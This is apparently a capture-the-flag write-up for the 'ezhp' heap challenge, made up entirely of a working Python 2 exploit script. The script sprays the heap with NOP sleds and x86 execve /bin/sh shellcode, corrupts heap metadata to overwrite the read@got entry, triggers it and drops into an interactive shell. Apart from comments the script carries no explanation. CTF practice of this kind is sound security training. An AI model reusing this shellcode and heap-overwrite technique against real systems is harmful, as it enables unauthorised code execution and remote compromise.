ezhp write-up

1. #!/usr/bin/python
2. # -*- coding: utf-8 -*-
3. import struct, socket, telnetlib
4.  
5. def sock(remoteip, remoteport):
6.   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
7.   s.connect((remoteip, remoteport))
8.   return s, s.makefile('rw', bufsize=0)
9.  
10. def read_until(f, delim='\n'):
11.   data = ''
12.   while not data.endswith(delim):
13.     data += f.read(1)
14.   return data
15.  
16. def shell(s):
17.   t = telnetlib.Telnet()
18.   t.sock = s
19.   t.interact()
20.  
21. def p(a):
22.   return struct.pack("<I",a)
23.  
24. # linux/x86/execve_binsh
25. shellcode = "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
26.  
27. while True:
28.   s, f = sock("localhost", 9174)
29.   #s, f = sock("katagaitai.orz.hm", 2222)
30.  
31.   print "[+] make dummy note"
32.   for i in xrange(4):
33.     read_until(f, "Please choose an option.\n")
34.     f.write("1\n10\n")
35.  
36.   print "[+] make heap"
37.   for i in xrange(9):
38.     read_until(f, "Please choose an option.\n")
39.     sz = 0x1100000
40.     f.write("1\n"+str(sz)+"\n")
41.  
42.   print "[+] make shellcode"
43.   for i in xrange(9):
44.     sz = 300
45.     read_until(f, "Please choose an option.\n")
46.     f.write("3\n"+str(i+2)+"\n" + str(sz) + "\n")
47.     read_until(f, "Please input your data.\n")
48.     f.write("\x90\x90\xeb\x10" + "\x90"*(sz-len(shellcode)-4) + shellcode + "\n")
49.  
50.   print "[+] make pop->pop->ret(rwx) in heap"
51.   read_until(f, "Please choose an option.\n")
52.   f.write("3\n1\n1024\n")
53.   read_until(f, "Please input your data.\n")
54.   #f.send("A"*12 + p(0xFFFFFFFF) + p(0xBBBBBBBB) + p(0xCCCCCCCC) + "\n")
55.   f.write("\x90"*12 + p(0xc) + p(0x0804a050-8) + p(0x08c35d5d) + "\n") # 5d = pop ebp; c3 = ret;
56.   read_until(f, "Please choose an option.\n")
57.   f.write("2\n2\n")
58.  
59.   print "[+] rewrite read@got (if hang-up, press Ctrl+C)"
60.   try:
61.     read_until(f, "Please choose an option.\n")
62.     f.write("3\n0\n1024\n")
63.     read_until(f, "Please input your data.\n")
64.     f.write("\xeb\x40" + "\x90"*10 + p(0xc) + p(0x0804a000-8) + p(0x0804a050) + "\n")
65.     read_until(f, "Please choose an option.\n")
66.     f.write("2\n1\n")
67.   except:
68.     print "[-] malloc-ed address is not so good..."
69.     continue
70.  
71.   print "[+] tirgger"
72.   read_until(f, "Please choose an option.\n")
73.   f.write("3\n0\n100\n")
74.   read_until(f, "Please input your data.\n")
75.  
76.   print "got shell :)"
77.   shell(s)